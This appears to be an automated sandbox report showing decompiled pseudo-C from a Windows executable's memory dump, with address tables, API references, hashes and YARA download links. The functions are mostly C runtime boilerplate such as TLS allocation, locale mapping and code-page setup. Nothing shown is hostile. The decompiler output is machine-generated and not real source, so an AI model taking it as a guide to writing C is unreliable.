                			E00CA1D61(intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t34;
				intOrPtr _t41;
				intOrPtr _t51;
				void* _t62;
				unsigned int _t64;
				signed int _t66;
				intOrPtr* _t68;
				void* _t70;

				_t62 = __edx;
				_t51 = __ecx;
				E00CBD870(E00CD1173, _t70);
				_t49 = 0;
				 *((intOrPtr*)(_t70 - 0x10)) = _t51;
				 *((intOrPtr*)(_t70 - 0x24)) = 0;
				 *(_t70 - 0x20) = 0;
				 *((intOrPtr*)(_t70 - 0x1c)) = 0;
				 *((intOrPtr*)(_t70 - 0x18)) = 0;
				 *((char*)(_t70 - 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				_t34 = E00CA399D(_t51, _t62, _t70 - 0x24, 0, 0); // executed
				if(_t34 != 0) {
					_t64 =  *(_t70 - 0x20);
					E00CA16C0(_t70 - 0x24, _t62, 1);
					_t68 =  *((intOrPtr*)(_t70 + 8));
					 *((char*)( *(_t70 - 0x20) +  *((intOrPtr*)(_t70 - 0x24)) - 1)) = 0;
					_t16 = _t64 + 1; // 0x1
					E00CA1837(_t68, _t16);
					_t41 =  *((intOrPtr*)(_t70 - 0x10));
					if( *((intOrPtr*)(_t41 + 0x6cb0)) != 3) {
						if(( *(_t41 + 0x45f4) & 0x00000001) == 0) {
							E00CB0FDE( *((intOrPtr*)(_t70 - 0x24)),  *_t68,  *((intOrPtr*)(_t68 + 4)));
						} else {
							_t66 = _t64 >> 1;
							E00CB1059( *((intOrPtr*)(_t70 - 0x24)),  *_t68, _t66);
							 *((short*)( *_t68 + _t66 * 2)) = 0;
						}
					} else {
						_push( *((intOrPtr*)(_t68 + 4)));
						_push( *_t68);
						_push( *((intOrPtr*)(_t70 - 0x24)));
						E00CB1094();
					}
					E00CA1837(_t68, E00CC2B33( *_t68));
					_t49 = 1;
				}
				E00CA159C(_t70 - 0x24);
				 *[fs:0x0] =  *((intOrPtr*)(_t70 - 0xc));
				return _t49;
			}











                0x00ca1d61
                0x00ca1d61
                0x00ca1d66
                0x00ca1d6f
                0x00ca1d73
                0x00ca1d76
                0x00ca1d79
                0x00ca1d7c
                0x00ca1d7f
                0x00ca1d82
                0x00ca1d8a
                0x00ca1d90
                0x00ca1d97
                0x00ca1d9f
                0x00ca1da7
                0x00ca1db2
                0x00ca1db5
                0x00ca1db9
                0x00ca1dbf
                0x00ca1dc4
                0x00ca1dce
                0x00ca1de6
                0x00ca1e07
                0x00ca1de8
                0x00ca1de8
                0x00ca1df0
                0x00ca1df9
                0x00ca1df9
                0x00ca1dd0
                0x00ca1dd0
                0x00ca1dd3
                0x00ca1dd5
                0x00ca1dd8
                0x00ca1dd8
                0x00ca1e17
                0x00ca1e1d
                0x00ca1e1f
                0x00ca1e23
                0x00ca1e2e
                0x00ca1e38

                APIs
                • __EH_prolog.LIBCMT ref: 00CA1D66
                  • Part of subcall function 00CA399D: __EH_prolog.LIBCMT ref: 00CA39A2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: H_prolog
                • String ID: CMT
                • API String ID: 3519838083-2756464174
                • Opcode ID: 4b6921e4676272c5ed63b32a158ce047e419fc9ed9e8837ebed39f96f8d1417e
                • Instruction ID: f2ffa2bda8ae83e920bb08a1df804b382e371fcce86f401d7cc74ef0deb37023
                • Opcode Fuzzy Hash: 4b6921e4676272c5ed63b32a158ce047e419fc9ed9e8837ebed39f96f8d1417e
                • Instruction Fuzzy Hash: D6217A729002099FCB11EF98C9519EEFBF6FF0A304F1800AEE855A7251CB325E00DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC9C64, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00CC9C64(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t20;
				int _t22;
				intOrPtr* _t30;
				signed int _t32;

				_t25 = __ecx;
				_push(__ecx);
				_t18 =  *0xcdd668; // 0x814d2927
				_v8 = _t18 ^ _t32;
				_push(__esi);
				_t20 = E00CC9990(0x16, "LCMapStringEx", 0xcd6084, "LCMapStringEx"); // executed
				_t30 = _t20;
				if(_t30 == 0) {
					_t22 = LCMapStringW(E00CC9CEC(_t25, _t30, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xcd2260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					_t22 =  *_t30();
				}
				return E00CBE203(_t22, _v8 ^ _t32);
			}









                0x00cc9c64
                0x00cc9c69
                0x00cc9c6a
                0x00cc9c71
                0x00cc9c74
                0x00cc9c86
                0x00cc9c8b
                0x00cc9c92
                0x00cc9cd5
                0x00cc9c94
                0x00cc9cb1
                0x00cc9cb7
                0x00cc9cb7
                0x00cc9ce9

                APIs
                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,31E85006,00000001,?,000000FF), ref: 00CC9CD5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: String
                • String ID: LCMapStringEx
                • API String ID: 2568140703-3893581201
                • Opcode ID: 4d32e39f08fb576e24d1ccabc697c8bc04980d85748cc85bcfa68630de02bb19
                • Instruction ID: 10fb11a2ced50b6ecc39724236dfef80fec0f006738d8f0c1e29d1ac406c7c55
                • Opcode Fuzzy Hash: 4d32e39f08fb576e24d1ccabc697c8bc04980d85748cc85bcfa68630de02bb19
                • Instruction Fuzzy Hash: D501D332541209BBCF12AF90DD05EEE7FA6EB08760F01455AFE1926261CA729931EB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC9C02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00CC9C02(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t10;
				int _t11;
				intOrPtr* _t19;
				signed int _t21;

				_push(__ecx);
				_t8 =  *0xcdd668; // 0x814d2927
				_v8 = _t8 ^ _t21;
				_t10 = E00CC9990(0x14, "InitializeCriticalSectionEx", 0xcd607c, 0xcd6084); // executed
				_t19 = _t10;
				if(_t19 == 0) {
					_t11 = InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xcd2260(_a4, _a8, _a12);
					_t11 =  *_t19();
				}
				return E00CBE203(_t11, _v8 ^ _t21);
			}









                0x00cc9c07
                0x00cc9c08
                0x00cc9c0f
                0x00cc9c24
                0x00cc9c29
                0x00cc9c30
                0x00cc9c4d
                0x00cc9c32
                0x00cc9c3d
                0x00cc9c43
                0x00cc9c43
                0x00cc9c61

                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00CC9291), ref: 00CC9C4D
                Strings
                • InitializeCriticalSectionEx, xrefs: 00CC9C1D
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CountCriticalInitializeSectionSpin
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2593887523-3084827643
                • Opcode ID: 0e7f861251bc215e9bf4a46a542ff80b26a1975ece351384ea5842bbc2d8fe88
                • Instruction ID: 8c417a2adffa6da1cb025daf0da1a85a1cd02ca54b4c9e20df6e209c00da3b35
                • Opcode Fuzzy Hash: 0e7f861251bc215e9bf4a46a542ff80b26a1975ece351384ea5842bbc2d8fe88
                • Instruction Fuzzy Hash: 52F0B431A4120CFBCB156F50DC05EAE7FA5EB08721B01416AFE1916260CA728E10EBC0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC9AA7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E00CC9AA7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t6;
				long _t7;
				intOrPtr* _t15;
				signed int _t17;

				_push(__ecx);
				_t4 =  *0xcdd668; // 0x814d2927
				_v8 = _t4 ^ _t17;
				_t6 = E00CC9990(3, "FlsAlloc", 0xcd6040, 0xcd6048); // executed
				_t15 = _t6;
				if(_t15 == 0) {
					_t7 = TlsAlloc();
				} else {
					 *0xcd2260(_a4);
					_t7 =  *_t15();
				}
				return E00CBE203(_t7, _v8 ^ _t17);
			}









                0x00cc9aac
                0x00cc9aad
                0x00cc9ab4
                0x00cc9ac9
                0x00cc9ace
                0x00cc9ad5
                0x00cc9ae6
                0x00cc9ad7
                0x00cc9adc
                0x00cc9ae2
                0x00cc9ae2
                0x00cc9afa

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Alloc
                • String ID: FlsAlloc
                • API String ID: 2773662609-671089009
                • Opcode ID: cd5edaa8ed244fd0426e115ad1c184ef3187db2c4e6e956cff99d5540f478765
                • Instruction ID: 43e0f8d40fd6c63d16ef17298ccc69bcb3c316c27b201553d10c8ce5f3c3b3e3
                • Opcode Fuzzy Hash: cd5edaa8ed244fd0426e115ad1c184ef3187db2c4e6e956cff99d5540f478765
                • Instruction Fuzzy Hash: 6CE02B31E46218B7C720AB65DC0AF6FBBA8DB14B21B01046FFD0957391CE716E10E6D9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC281A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                Download Yara Rule
                C-Code - Quality: 68%
                			E00CC281A(void* __eflags, intOrPtr _a4) {
				intOrPtr* _t2;
				intOrPtr* _t6;

				_t2 = E00CC26F9(4, "FlsAlloc", 0xcd4394, "FlsAlloc"); // executed
				_t6 = _t2;
				if(_t6 == 0) {
					return TlsAlloc();
				}
				L00CBE2DD();
				return  *_t6(_a4);
			}





                0x00cc282f
                0x00cc2834
                0x00cc283b
                0x00cc284e
                0x00cc284e
                0x00cc2842
                0x00cc284b

                APIs
                • try_get_function.LIBVCRUNTIME ref: 00CC282F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: try_get_function
                • String ID: FlsAlloc
                • API String ID: 2742660187-671089009
                • Opcode ID: bef63aa743a12c02414df9c4ac54f6e346d6a2945b4ce8dfc01bcbe5b3d09eb1
                • Instruction ID: 37540ce930c75cda1701aeae76430522a9c759111fb679c586221c4142adf19a
                • Opcode Fuzzy Hash: bef63aa743a12c02414df9c4ac54f6e346d6a2945b4ce8dfc01bcbe5b3d09eb1
                • Instruction Fuzzy Hash: A9D01722682728A7C91432DDAC02BAABA588A01BA1F054173FF0C652A2D6A5591066E2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCA873, Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E00CCA873(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed int _t60;
				signed char _t62;
				signed int _t63;
				signed char* _t71;
				signed char* _t72;
				int _t76;
				signed int _t79;
				signed char* _t80;
				short* _t81;
				int _t85;
				signed char _t86;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				int _t92;
				int _t93;
				intOrPtr _t96;
				signed int _t97;

				_t48 =  *0xcdd668; // 0x814d2927
				_v8 = _t48 ^ _t97;
				_t96 = _a8;
				_t76 = E00CCA446(__eflags, _a4);
				if(_t76 != 0) {
					_t92 = 0;
					__eflags = 0;
					_t79 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0xcdd828)) - _t76;
						if( *((intOrPtr*)(_t51 + 0xcdd828)) == _t76) {
							break;
						}
						_t79 = _t79 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t79;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t76 - 0xfde8;
							if(_t76 == 0xfde8) {
								L23:
								_t60 = _t51 | 0xffffffff;
							} else {
								__eflags = _t76 - 0xfde9;
								if(_t76 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t76 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t51 = GetCPInfo(_t76,  &_v28);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0xd00854 - _t92; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												E00CCA4B9(_t96);
												goto L37;
											}
										} else {
											E00CBE920(_t92, _t96 + 0x18, _t92, 0x101);
											 *(_t96 + 4) = _t76;
											 *(_t96 + 0x21c) = _t92;
											_t76 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t96 + 8) = _t92;
											} else {
												__eflags = _v22;
												_t71 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t86 = _t71[1];
														__eflags = _t86;
														if(_t86 == 0) {
															goto L16;
														}
														_t89 = _t86 & 0x000000ff;
														_t87 =  *_t71 & 0x000000ff;
														while(1) {
															__eflags = _t87 - _t89;
															if(_t87 > _t89) {
																break;
															}
															 *(_t96 + _t87 + 0x19) =  *(_t96 + _t87 + 0x19) | 0x00000004;
															_t87 = _t87 + 1;
															__eflags = _t87;
														}
														_t71 =  &(_t71[2]);
														__eflags =  *_t71;
														if( *_t71 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t72 = _t96 + 0x1a;
												_t85 = 0xfe;
												do {
													 *_t72 =  *_t72 | 0x00000008;
													_t72 =  &(_t72[1]);
													_t85 = _t85 - 1;
													__eflags = _t85;
												} while (_t85 != 0);
												 *(_t96 + 0x21c) = E00CCA408( *(_t96 + 4));
												 *(_t96 + 8) = _t76;
											}
											_t93 = _t96 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00CCA51E(_t76, _t89, _t93, _t96, _t96); // executed
											L37:
											_t60 = 0;
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00CBE920(_t92, _t96 + 0x18, _t92, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xcdd838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t80 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t80[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t90 =  *_t80 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t90 - _t63;
									if(_t90 > _t63) {
										break;
									}
									__eflags = _t90 - 0x100;
									if(_t90 < 0x100) {
										_t31 = _t92 + 0xcdd820; // 0x8040201
										 *(_t96 + _t90 + 0x19) =  *(_t96 + _t90 + 0x19) |  *_t31;
										_t90 = _t90 + 1;
										__eflags = _t90;
										_t63 = _t80[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t80 =  &(_t80[2]);
								__eflags =  *_t80;
								if( *_t80 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t92 = _t92 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t96 + 4) = _t76;
					 *(_t96 + 8) = 1;
					 *(_t96 + 0x21c) = E00CCA408(_t76);
					_t81 = _t96 + 0xc;
					_t89 = _v36 + 0xcdd82c;
					_t93 = 6;
					do {
						_t58 =  *_t89;
						_t89 = _t89 + 2;
						 *_t81 = _t58;
						_t81 = _t81 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L36;
				} else {
					E00CCA4B9(_t96);
					_t60 = 0;
				}
				L39:
				return E00CBE203(_t60, _v8 ^ _t97);
			}































                0x00cca87b
                0x00cca882
                0x00cca88a
                0x00cca892
                0x00cca897
                0x00cca8a8
                0x00cca8a8
                0x00cca8aa
                0x00cca8ac
                0x00cca8ae
                0x00cca8b1
                0x00cca8b1
                0x00cca8b7
                0x00000000
                0x00000000
                0x00cca8bd
                0x00cca8be
                0x00cca8c1
                0x00cca8c4
                0x00cca8c9
                0x00000000
                0x00cca8cb
                0x00cca8cb
                0x00cca8d1
                0x00cca99f
                0x00cca99f
                0x00cca8d7
                0x00cca8d7
                0x00cca8dd
                0x00000000
                0x00cca8e3
                0x00cca8e7
                0x00cca8ed
                0x00cca8ef
                0x00000000
                0x00cca8f5
                0x00cca8fa
                0x00cca900
                0x00cca902
                0x00cca98c
                0x00cca992
                0x00000000
                0x00cca994
                0x00cca995
                0x00000000
                0x00cca995
                0x00cca908
                0x00cca912
                0x00cca917
                0x00cca91f
                0x00cca925
                0x00cca926
                0x00cca929
                0x00cca97c
                0x00cca92b
                0x00cca92b
                0x00cca92f
                0x00cca932
                0x00cca934
                0x00cca934
                0x00cca937
                0x00cca939
                0x00000000
                0x00000000
                0x00cca93b
                0x00cca93e
                0x00cca949
                0x00cca949
                0x00cca94b
                0x00000000
                0x00000000
                0x00cca943
                0x00cca948
                0x00cca948
                0x00cca948
                0x00cca94d
                0x00cca950
                0x00cca953
                0x00000000
                0x00000000
                0x00000000
                0x00cca953
                0x00cca934
                0x00cca955
                0x00cca955
                0x00cca958
                0x00cca95d
                0x00cca95d
                0x00cca960
                0x00cca961
                0x00cca961
                0x00cca961
                0x00cca971
                0x00cca977
                0x00cca977
                0x00cca981
                0x00cca984
                0x00cca985
                0x00cca986
                0x00ccaa4a
                0x00ccaa4b
                0x00ccaa50
                0x00ccaa51
                0x00ccaa51
                0x00ccaa51
                0x00cca902
                0x00cca8ef
                0x00cca8dd
                0x00cca8d1
                0x00000000
                0x00ccaa53
                0x00cca9b1
                0x00cca9b9
                0x00cca9b9
                0x00cca9bd
                0x00cca9c0
                0x00cca9c6
                0x00cca9c9
                0x00cca9c9
                0x00cca9cc
                0x00cca9ce
                0x00cca9d0
                0x00cca9d0
                0x00cca9d3
                0x00cca9d5
                0x00000000
                0x00000000
                0x00cca9d7
                0x00cca9da
                0x00cca9f6
                0x00cca9f6
                0x00cca9f8
                0x00000000
                0x00000000
                0x00cca9df
                0x00cca9e5
                0x00cca9e7
                0x00cca9ed
                0x00cca9f1
                0x00cca9f1
                0x00cca9f2
                0x00000000
                0x00cca9f2
                0x00000000
                0x00cca9e5
                0x00cca9fa
                0x00cca9fd
                0x00ccaa00
                0x00000000
                0x00000000
                0x00000000
                0x00ccaa00
                0x00ccaa02
                0x00ccaa02
                0x00ccaa05
                0x00ccaa06
                0x00ccaa09
                0x00ccaa0c
                0x00ccaa0c
                0x00ccaa12
                0x00ccaa15
                0x00ccaa24
                0x00ccaa2d
                0x00ccaa32
                0x00ccaa38
                0x00ccaa39
                0x00ccaa39
                0x00ccaa3c
                0x00ccaa3f
                0x00ccaa42
                0x00ccaa45
                0x00ccaa45
                0x00ccaa45
                0x00000000
                0x00cca899
                0x00cca89a
                0x00cca8a0
                0x00cca8a0
                0x00ccaa54
                0x00ccaa63

                APIs
                  • Part of subcall function 00CCA446: GetOEMCP.KERNEL32(00000000,?,?,00CCA6CF,?), ref: 00CCA471
                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CCA714,?,00000000), ref: 00CCA8E7
                • GetCPInfo.KERNEL32(00000000,00CCA714,?,?,?,00CCA714,?,00000000), ref: 00CCA8FA
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: CodeInfoPageValid
                • String ID:
                • API String ID: 546120528-0
                • Opcode ID: ef5107395b086f9ca98b64a031213e8711bf8947cc9c4802a0e175ea9d5fe8b1
                • Instruction ID: d75f73f3384a1ea79d9cde913dd6bb73171ae79279b2264d6cb0a5ed6e2495f5
                • Opcode Fuzzy Hash: ef5107395b086f9ca98b64a031213e8711bf8947cc9c4802a0e175ea9d5fe8b1
                • Instruction Fuzzy Hash: 19513670D0024D5FDB25CF72C84AFBBBBE5AF01318F14806ED0A687192D7349A46DB92
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CA1382, Relevance: 3.1, APIs: 2, Instructions: 96COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E00CA1382(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00CBD870(_t56, _t91);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00CA943C(_t78);
				 *_t89 = 0xcd22e8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00CA5E99(_t89 + 0x1024, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00CAC4CA(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00CA151B();
				_t62 = E00CA151B();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00CBD82C(_t86, _t89, _t98, 0x82e8);
					 *((intOrPtr*)(_t91 + 8)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00CAAD1B(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00CBE920(_t87, _t89 + 0x2208, 0, 0x40);
				E00CBE920(_t87, _t89 + 0x2248, 0, 0x34);
				E00CBE920(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}















                0x00ca1382
                0x00ca1382
                0x00ca1382
                0x00ca1382
                0x00ca1382
                0x00ca1387
                0x00ca138a
                0x00ca138c
                0x00ca138f
                0x00ca1396
                0x00ca13a2
                0x00ca13a5
                0x00ca13b0
                0x00ca13b4
                0x00ca13bf
                0x00ca13c5
                0x00ca13cb
                0x00ca13d6
                0x00ca13de
                0x00ca13e2
                0x00ca13e5
                0x00ca13eb
                0x00ca13f1
                0x00ca13f3
                0x00ca1418
                0x00ca13f5
                0x00ca13fa
                0x00ca1400
                0x00ca1403
                0x00ca1409
                0x00ca1414
                0x00ca140b
                0x00ca140d
                0x00ca140d
                0x00ca1409
                0x00ca141b
                0x00ca1427
                0x00ca142e
                0x00ca1435
                0x00ca143e
                0x00ca1449
                0x00ca1453
                0x00ca1459
                0x00ca145f
                0x00ca1465
                0x00ca146b
                0x00ca1471
                0x00ca1477
                0x00ca147e
                0x00ca1484
                0x00ca148a
                0x00ca1490
                0x00ca1496
                0x00ca149c
                0x00ca14ab
                0x00ca14ba
                0x00ca14c5
                0x00ca14cd
                0x00ca14d3
                0x00ca14d9
                0x00ca14df
                0x00ca14e5
                0x00ca14eb
                0x00ca14f1
                0x00ca14fa
                0x00ca1500
                0x00ca1506
                0x00ca150e
                0x00ca1518

                APIs
                • __EH_prolog.LIBCMT ref: 00CA1382
                  • Part of subcall function 00CA5E99: __EH_prolog.LIBCMT ref: 00CA5E9E
                  • Part of subcall function 00CAC4CA: __EH_prolog.LIBCMT ref: 00CAC4CF
                  • Part of subcall function 00CAC4CA: new.LIBCMT ref: 00CAC512
                  • Part of subcall function 00CAC4CA: new.LIBCMT ref: 00CAC536
                • new.LIBCMT ref: 00CA13FA
                  • Part of subcall function 00CAAD1B: __EH_prolog.LIBCMT ref: 00CAAD20
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
